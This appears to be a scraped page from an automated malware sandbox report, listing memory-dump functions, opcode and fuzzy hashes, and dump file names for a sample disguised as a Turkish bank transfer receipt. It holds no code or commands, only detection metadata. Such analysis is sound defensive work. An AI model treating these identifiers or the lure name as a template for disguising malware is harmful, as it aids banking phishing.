Instruction ID: 1c35574f7ebf8c7ca50643c50ff24486b7f3858c19e6e0d4ca3d804c5f8f2ffe
Opcode Fuzzy Hash: 5ef7ba4969c0b00af285b5de342546a37bf0b519390f585117218211e94e42a5
Instruction Fuzzy Hash: 9A01D871B057145FD365DB29CC40A6BBBEADFDA650B15416AE905CB391DA30EC01C7A0

Function 06F4EE80 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87d0f8016d35f577873de98f3f6d3feba83f0d95c65dc5b8d837b35342502023
Instruction ID: 6f0c2bb06356e8ac253133b55bd27c98dce00cffa5489cba474bc5399ce1b29c
Opcode Fuzzy Hash: 87d0f8016d35f577873de98f3f6d3feba83f0d95c65dc5b8d837b35342502023
Instruction Fuzzy Hash: 1B115E356002459FC744DF68D884D9EBBB6FF89324B148599E909CB362DB71ED02CB91

Function 06FBD760 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96b2f9a99ba4b619faadff4eb252f61cd970ba49f256f3f0942a86ed14aefd4e
Instruction ID: d8cfe75516cdae47603ff53712c8e8aa71914ba1fa73c349bc2cede0e3837e7b
Opcode Fuzzy Hash: 96b2f9a99ba4b619faadff4eb252f61cd970ba49f256f3f0942a86ed14aefd4e
Instruction Fuzzy Hash: D201F935E16264DFD351476294193F53BA99F4A315B6880ABE008DA142DABA8446CBA3

Function 06F07ED8 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2d6f2e451fdcd98780d4c53518ff5d7aa96a42d55f42f04f399123f4146d0a2
Instruction ID: 48e895652e65f9681a6d11591422209434d825ba97759f0e6f2a94f28b5623a2
Opcode Fuzzy Hash: e2d6f2e451fdcd98780d4c53518ff5d7aa96a42d55f42f04f399123f4146d0a2
Instruction Fuzzy Hash: 6A01E9757102048FD754EF29D884A5ABBFAEF8822171545AAE505CB371DB71FC41CB90

Function 06F4F0F9 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23a9c53dfdcc9ea6e599401abff60c0fa92fab33a9ae1dce7867b3fedad2e5fd
Instruction ID: a4b3bc4327d908783e65247714499934c56bb4df41971619f7e881fc65d94593
Opcode Fuzzy Hash: 23a9c53dfdcc9ea6e599401abff60c0fa92fab33a9ae1dce7867b3fedad2e5fd
Instruction Fuzzy Hash: D2F0F432B192558FDB48DBA4F4001AABFE5DF85124B1440EBE50DCB651EE31C940C781

Function 06F09C30 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dde01cf19b57e9d22d3fb075d8e9024af22c1dd30e8136a362850649e4f61fd
Instruction ID: 4cfe2413d69cd5eefe561f28701fb085a25f1cec4b677c599f098ac99b723e02
Opcode Fuzzy Hash: 6dde01cf19b57e9d22d3fb075d8e9024af22c1dd30e8136a362850649e4f61fd
Instruction Fuzzy Hash: 08F08133B04219AF5B109E59E8848BFBBEEFB88661714802AF659C3240DF3198059B60

Function 00C2D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379229690.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c2d000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb51afe2cedfe9f88e017ff9d6cf72ff2d5d32d6a2eea6fbba50d0dbacd6f4af
Instruction ID: ff7c3d226722bbfae19539a9a5f3146f27b56258db6e00a6a25c3590553d2380
Opcode Fuzzy Hash: cb51afe2cedfe9f88e017ff9d6cf72ff2d5d32d6a2eea6fbba50d0dbacd6f4af
Instruction Fuzzy Hash: BC0126310043509BF7108F26DD84B67FBD8DF61B20F18C56AED1A8A68AD67D9D40CAB2

Function 06FB0EA8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38b77736c5043e4217ebd3a3545157b343f37a9cd9234a7640da2ca19808e5fc
Instruction ID: 097203f94fa051648270e395936ea67812614eba186da45cda4748a7d8413b65
Opcode Fuzzy Hash: 38b77736c5043e4217ebd3a3545157b343f37a9cd9234a7640da2ca19808e5fc
Instruction Fuzzy Hash: 0CF0F432705114AFD7608B0EE98489BF769EB84320712C267E009DBA41CB22EC458390

Function 06FB75B9 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4726e461624deeb6ff8b228e755a637fede5ff747c8b9a7824fb59615112d93
Instruction ID: 090c9cbee4b87bb816c63d0b59758077241e875dee9ebcf65d80f0952a8875cb
Opcode Fuzzy Hash: f4726e461624deeb6ff8b228e755a637fede5ff747c8b9a7824fb59615112d93
Instruction Fuzzy Hash: 4DF0C2323056655FC395A779ECA482EBFE7EBCE6103040269E54EC7B92DE309D018B92

Function 06F072C8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5a2425d3d59661af00a38a1539d5fa46ae2e6e49faec63f787fe69f919ad87a
Instruction ID: 553fcf35c09edb318c35db6cadf5c8de6071e3f0b500786b96215e385571e687
Opcode Fuzzy Hash: d5a2425d3d59661af00a38a1539d5fa46ae2e6e49faec63f787fe69f919ad87a
Instruction Fuzzy Hash: B101F431B01302CFFBA8AA35D804623B7E7BF8420471488BDE44282A84DA71F481EB90

Function 06F05C80 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f82b1f7672ebbfe789c7909b122d62c68885be907b192477cc2da87db1dcc94
Instruction ID: 5c6a93185c22c4599967bc23cf35a680afb6cfb84179c25c842441f26fc55d4e
Opcode Fuzzy Hash: 2f82b1f7672ebbfe789c7909b122d62c68885be907b192477cc2da87db1dcc94
Instruction Fuzzy Hash: 0AF0C8353103404FCA16E768E45596E77E7DFC9200314496ED44ADB695EF30EE0697A2

Function 06F08180 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d776608838900be806f9384b49330fa3ed3d9a9e6bcd76730f8c1f9076d73b
Instruction ID: fdc1af6b386a35522722c617a5a8b86d55d607d8701f3781b9d9cefea5358688
Opcode Fuzzy Hash: 41d776608838900be806f9384b49330fa3ed3d9a9e6bcd76730f8c1f9076d73b
Instruction Fuzzy Hash: D2F08B31B113405FEB308624DC05F923BE69B46721F058256F224CB0E2D3B1D915D350

Function 00C2D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379229690.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c2d000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94615faeba12403b0f773081f0c9d5a7c8ee4b654c9f1165d60680ced4a9d4c2
Instruction ID: 8c20a7455bb966dadae2359350a16036f99886a57d59f952e4b1c144c2840a89
Opcode Fuzzy Hash: 94615faeba12403b0f773081f0c9d5a7c8ee4b654c9f1165d60680ced4a9d4c2
Instruction Fuzzy Hash: B1F0CD32004340AFEB108F16D988B63FBD8EB91734F18C49AED594A28AC2799C40CAB1

Function 06F05C90 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d26b79a1e9b5ceae6afaa428eb0572816e6d8f8ef7ac3f93c546a59c78e62720
Instruction ID: b58a5f4f69908dc86397e4445530272ceebbb8e48e4ecb7e6a4738381ad7e36b
Opcode Fuzzy Hash: d26b79a1e9b5ceae6afaa428eb0572816e6d8f8ef7ac3f93c546a59c78e62720
Instruction Fuzzy Hash: C3F0B4353103004FCA19E769E85196E77EBDFCD210310492AD00A8B785EF70ED0697E5

Function 06F4DFE8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd13fcc6d30aa089c3fecc805d215dd488f6bdf71e4f42be6561b2a7ad252080
Instruction ID: 21aa019de78ab3355a55da4fd88a9c6d4a1f2e523897054c8acc0a450e8eccc3
Opcode Fuzzy Hash: dd13fcc6d30aa089c3fecc805d215dd488f6bdf71e4f42be6561b2a7ad252080
Instruction Fuzzy Hash: 8AF0A333B0C3914FD320151A68503737FEADBC1291F08106FE155C7A52C9294D05C371

Function 06F0AD80 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a98b280e3c6ba55b678ae634a1c5bfad7abf477c5187f3e93774e00e045548
Instruction ID: 5fd1ed61c68a26d937b24689fcbadae14c75507807d94cc1d63b84f753e6f996
Opcode Fuzzy Hash: 33a98b280e3c6ba55b678ae634a1c5bfad7abf477c5187f3e93774e00e045548
Instruction Fuzzy Hash: 9E011675E11218AFEB04CFA9C944ADEBFF2AF88310F148129E80577391CB715940DFA0

Function 06F09C21 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ab934aa65fb3bcbc59a9d4d49b948161b2bbddc0baaf4a78daa57dfaabf6932
Instruction ID: 7ff78c21b658c4c8274de2e4a75f12cddc8153e48ceb2c8bc66660276770c8eb
Opcode Fuzzy Hash: 3ab934aa65fb3bcbc59a9d4d49b948161b2bbddc0baaf4a78daa57dfaabf6932
Instruction Fuzzy Hash: 23F0EC32F191175F9F11DA755C44DBF7BFEEB855503094027F155D3141EA30C9099760

Function 06FB8240 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aa304b4f4eaff759f14e090961a707a484d024d6ad6b24fc0f5ebc658e43282
Instruction ID: 682e4f92b50364d19e17b42b274cd7252b9cfc321a2ee1389b74d7bd1b9e6e2b
Opcode Fuzzy Hash: 5aa304b4f4eaff759f14e090961a707a484d024d6ad6b24fc0f5ebc658e43282
Instruction Fuzzy Hash: FEF0CD72A00348DFCB01CBA4D840ADCBB72FF88301B088096E4469B261DA35E952DB51

Function 06FBC1B0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6173823d61b13b672083490ec0f1d85137c22029089251226edc57c367731b4
Instruction ID: 2e20d7d1a49a1fbb5333be6cbfec8041b1e8c1e6b80f6e4de53cefd773981d2a
Opcode Fuzzy Hash: d6173823d61b13b672083490ec0f1d85137c22029089251226edc57c367731b4
Instruction Fuzzy Hash: 2AF0BE73A08108AFDF89DF98DC4199A7FBAEF54210B0580A7E418D7270E630AD10C790

Function 06FB7569 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6482cd6b85ac4710b012e0f6fcbfba22c47624fa79689d5e103b6d5a466c9989
Instruction ID: 95f88b8c0a9633c15a3bfd5c5d691a287eabf184735401ab0b34a1d2bf582246
Opcode Fuzzy Hash: 6482cd6b85ac4710b012e0f6fcbfba22c47624fa79689d5e103b6d5a466c9989
Instruction Fuzzy Hash: 0FE0657120563A1FC349B7649C1086E3F669ACA11070106E5FA499BEA2CF109D0647F5

Function 06FB0E68 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a0a2656ece67166877ba4222c8faeefa7f3df4de20bad2a1e5ce5831fa375a0
Instruction ID: 2ed8903121fa58b80424ae5b25e65e87f92be9ca267858d1ffe05d3975ced339
Opcode Fuzzy Hash: 4a0a2656ece67166877ba4222c8faeefa7f3df4de20bad2a1e5ce5831fa375a0
Instruction Fuzzy Hash: 17E0C232B1A2518BA7051A6E689842FBF9EEFC95267090A7FF108C7380ED65CC098261

Function 06FBB860 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc5270d84a3321be3dade2dae30c509fb4bd4ccd27a3f75a7e0f0e216d1f02a
Instruction ID: 378a036810f0491d0ebbe4a5f77ce227f1c6d1145f557e6bb19f61b2eaefa707
Opcode Fuzzy Hash: 3fc5270d84a3321be3dade2dae30c509fb4bd4ccd27a3f75a7e0f0e216d1f02a
Instruction Fuzzy Hash: 98E0862250E3D15FD70652B01C292963F91AB8201530845D7F496CB2C3DA2545568672

Function 06FB0E78 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9842b05c9845651d151e3acf364e157425fe61bdc19c2e44ed38e7dd25eeff83
Instruction ID: 684bf2f9113894a7cb4eae2a5d36a565179a4b0379f5e5a881a145b31212f58e
Opcode Fuzzy Hash: 9842b05c9845651d151e3acf364e157425fe61bdc19c2e44ed38e7dd25eeff83
Instruction Fuzzy Hash: 2AD0A732716210176714294F78C847FBF8EEBCC576314053AF50DC3380DDA1CC0282A0

Function 06F4F168 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98fcf583c13e35cd5e1fb7d1fa595bd20803754d493bed6e725a4325e826d035
Instruction ID: aaa3ea015b697adc133ce4201c3fba532845efe04bb419be2488c22bdf86a0dc
Opcode Fuzzy Hash: 98fcf583c13e35cd5e1fb7d1fa595bd20803754d493bed6e725a4325e826d035
Instruction Fuzzy Hash: E5D0A92060B3B82B821269A93C10CC77F5E8883F32F3492C2F928C2892CA084C0246F2

Function 06FB072A Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec3e310bc7f749153117fc095837185d2512e0f12e240dd438208ec905d9d260
Instruction ID: c511615009cd2f643c078414b87f925b01bdbe6ee3c84c1cae3c36dd93dbb846
Opcode Fuzzy Hash: ec3e310bc7f749153117fc095837185d2512e0f12e240dd438208ec905d9d260
Instruction Fuzzy Hash: A4D0A739B500148FE750D699E4206EA7B65DBC91117500095E207CB330CEB18C16CFC0

Function 06FBCA89 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e73868c25dc5c6caa21f1cc4f6c89ad0e364032980395e21107709bac4a5f5
Instruction ID: 6316366e5fb9e75d7b2ef404e8512036dc8f199b2e8676a803c587c27ce84e71
Opcode Fuzzy Hash: 52e73868c25dc5c6caa21f1cc4f6c89ad0e364032980395e21107709bac4a5f5
Instruction Fuzzy Hash: 52D05E24F013049BF344E6B1E41936E2792AB84320F208094B495973C4CD388A41C750

Function 06FB683F Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d983f20afbaa68ff1805caaeaf68099e93cf0e79fee9f9798f59782ef7b9a799
Instruction ID: 5366425d6a7a76f305ef68927b46d5bc49670135e5f9b671982740153d71f25e
Opcode Fuzzy Hash: d983f20afbaa68ff1805caaeaf68099e93cf0e79fee9f9798f59782ef7b9a799
Instruction Fuzzy Hash: B4D0C93508E2509FC7018BA498598927BB59E6A16032A42C2F148DBAB3D212DC058B50

Function 06FB017C Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: def5fb8951b4f0b972300fa11c1128b748efa5557d3430fd7a6c15d03cfdd82f
Instruction ID: a22573c2716e82045a76ac401882d1ca8d8740125b29eabecdc8a6626d4a5b92
Opcode Fuzzy Hash: def5fb8951b4f0b972300fa11c1128b748efa5557d3430fd7a6c15d03cfdd82f
Instruction Fuzzy Hash: D0D0C975B404148F9B84DBA9E4505DD7BF5EF89215B0050A6E21AC7670DF7098158F90

Function 06FB6880 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ed53502701d80801252b1ccef2a08bb6595aae47328928390f231e035958d61
Instruction ID: c4a7da658e1b78e1d22e67b938f88f57d8b106e6e6aeceb760d93cd0dedb038f
Opcode Fuzzy Hash: 6ed53502701d80801252b1ccef2a08bb6595aae47328928390f231e035958d61
Instruction Fuzzy Hash: 59C0120124E3A51FC603A2A028240FB6F224A0B401729A0CBF8408A946CA284A0297A2

Function 06FB03E4 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d595e49d224098ca53af04fe72803572c78178c487c4d483c2fc518ab829d9c5
Instruction ID: dc323a3531f6316f315bf3b958fda825ea6c6098a0174b9429b41faedf300f3a
Opcode Fuzzy Hash: d595e49d224098ca53af04fe72803572c78178c487c4d483c2fc518ab829d9c5
Instruction Fuzzy Hash: C9D012367904008F8B88DBADE0148ED37A6EFC8226B0110E6F30ACBA30CF709C518BC0

Function 06F00C2A Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32fc0679784af1cacd9e5c5bcd857e32def1ec34ea66563509525b1ae2b82fe4
Instruction ID: 1c703bbeea750a8febef3d2401e16db5ac27a25ac055e05b6d11dea60102396b
Opcode Fuzzy Hash: 32fc0679784af1cacd9e5c5bcd857e32def1ec34ea66563509525b1ae2b82fe4
Instruction Fuzzy Hash: E3C08C768053491FD7216F60FC46E977B2DCB89312F0010E5B4082A05B98651C698AF6

Function 06F01150 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de87dd2d2f105ae2cef9208975c914f821aba9787591ab170e97b8cd12b1d2bf
Instruction ID: 66bd72a9b8353563dc92e58aa2adc6ccc474d37a7ce3b0f9639558195e04a256
Opcode Fuzzy Hash: de87dd2d2f105ae2cef9208975c914f821aba9787591ab170e97b8cd12b1d2bf
Instruction Fuzzy Hash: 0BD0A775637600CFD3408B78484D7076B92DBA1206F114829D68585295CD3082158714

Function 06FBB870 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e541073971220d73470b79a63193fa339f1d065e818d47cf8ba93ab08aba0a0
Instruction ID: b9c4eb11898c59d12fb62c25b48bbb5bbd4d3aa1407322f78c12e1ca04ca91ef
Opcode Fuzzy Hash: 0e541073971220d73470b79a63193fa339f1d065e818d47cf8ba93ab08aba0a0
Instruction Fuzzy Hash: 0CC08C343023084BF60032F2A40E31B3BCAEB84630F5088A0B90B873C5EE2288928271

Function 06FBF9B7 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf72c839b8815604d5aed59b3872d1be2c7ea423e7eb67446fb5d5e223fc6c5
Instruction ID: 31860b8147a576510bbf0e1c9d86c370e07cd7aa75c84cc13e95051be80819a8
Opcode Fuzzy Hash: 0cf72c839b8815604d5aed59b3872d1be2c7ea423e7eb67446fb5d5e223fc6c5
Instruction Fuzzy Hash: B9C08C3180260C8FD7242BA9BC0E7A83B796702212F001010E20C404689BA00080CF77

Function 06FBF9B8 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 134cd9907da41e0586bf6173b3b4eb0492afc38d574052fc3ff812dfed7f749b
Instruction ID: f308cdb6d4b2fd50019544020aa6d6fe9fbbcf3dccaf249202d656789d6d0364
Opcode Fuzzy Hash: 134cd9907da41e0586bf6173b3b4eb0492afc38d574052fc3ff812dfed7f749b
Instruction Fuzzy Hash: 59C08C3180260C8FD7142BA9BC0D3A837796702212F001010E20C404689BA00040CF27

Function 06F00C03 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
